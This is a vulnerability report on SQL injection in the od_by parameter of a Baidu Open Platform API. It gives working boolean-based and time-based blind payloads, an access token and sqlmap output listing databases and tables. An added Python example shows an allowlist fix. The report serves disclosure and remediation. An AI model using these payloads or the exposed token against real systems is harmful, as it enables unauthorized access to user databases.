An SQL Injection on the Baidu Open Platform

Source: compiled by this site  Author: anonymous  Date: 2014-09-05

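For the SQL injection on the Baidu Open Platform, I found that only the parameter sort was fixed; surprisingly, od_by was overlooked.
http://developer.baidu.com/rest/2.0/dev/v1/app/base/list2?callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time&sort=asc,injection point&access_token=TOKEN&_=1404913266225
The parameter od_by is also vulnerable to SQL injection. Please check again.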

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: od_by

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time,(if((1=1 AND 6232=6232),1,(select 1 union select 2)))&sort=asc&access_token=10.7883fcf30a90b0587d60f65315f700ac.1405941049.1183630&_=1405941048347



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time,(if((1=1 AND SLEEP(5)),1,(select 1 union select 2)))&sort=asc&access_token=10.7883fcf30a90b0587d60f65315f700ac.1405941049.1183630&_=1405941048347

---

[19:27:34] [INFO] testing MySQL

[19:27:34] [INFO] confirming MySQL

[19:27:35] [INFO] the back-end DBMS is MySQL

web application technology: Apache

back-end DBMS: MySQL >= 5.0.0

[19:27:35] [INFO] fetching database names

[19:27:35] [INFO] fetching number of databases

[19:27:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[19:27:35] [INFO] retrieved: 4

[19:27:36] [INFO] retrieved: information_schema

[19:28:09] [INFO] retrieved: mco_***************

[19:28:47] [INFO] retrieved: mco_***************

[19:29:16] [INFO] retrieved: mco_***************

available databases [4]:

[*] information_schema

[*] mco_***************

[*] mco_***************

[*] mco_***************





[*] shutting down at 19:29:53







back-end DBMS: MySQL >= 5.0.0

[20:14:02] [INFO] fetching tables for database: 'mco_***************'

[20:14:02] [INFO] fetching number of tables for database 'mco_***************'

[20:14:02] [INFO] resumed: 98

[20:14:02] [INFO] resumed: answer

[20:14:02] [INFO] resumed: devel***************

[20:14:02] [INFO] resumed: devel***************

[20:14:02] [INFO] resumed: devel***************
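
The od_by and sort values in the request above both select how the result is ordered, and neither can be passed as a bound query parameter, so a fix has to cover both. The following is an added example, not code from the original report or from Baidu: it maps both values through allowlists before they reach the SQL text. The table name, column names, allowlist contents and the in-memory SQLite database standing in for MySQL are assumptions.

```python
import sqlite3

# Hypothetical allowlists: identifiers and keywords cannot be bound as query
# parameters, so each request value maps to a fixed SQL fragment or is rejected.
ORDER_COLUMNS = {"create_time": "create_time", "name": "name"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_clause(od_by: str, sort: str) -> str:
    """Return an ORDER BY clause built only from allowlisted fragments."""
    try:
        return f"ORDER BY {ORDER_COLUMNS[od_by]} {DIRECTIONS[sort.lower()]}"
    except KeyError:
        raise ValueError("unsupported od_by or sort value") from None


def list_apps(conn, od_by="create_time", sort="asc", pn=1, ps=10):
    """List one page of apps; pn/ps are bound, the ordering is allowlisted."""
    if pn < 1 or not 1 <= ps <= 100:
        raise ValueError("pn/ps out of range")
    sql = ("SELECT name, create_time FROM app "
           f"{build_order_clause(od_by, sort)} LIMIT ? OFFSET ?")
    return conn.execute(sql, (ps, (pn - 1) * ps)).fetchall()


def demo_db():
    """Constructed sample data (hypothetical 'app' table)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app (name TEXT, create_time INTEGER)")
    conn.executemany("INSERT INTO app VALUES (?, ?)",
                     [("b", 2), ("a", 3), ("c", 1)])
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(list_apps(db, "create_time", "desc"))
    # Constructed inputs in the shape of the od_by payload shown in the report.
    for bad in ("create_time,(if((1=1),1,(select 1 union select 2)))",
                "create_time--"):
        try:
            list_apps(db, od_by=bad)
        except ValueError as exc:
            print("rejected:", exc)
```
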
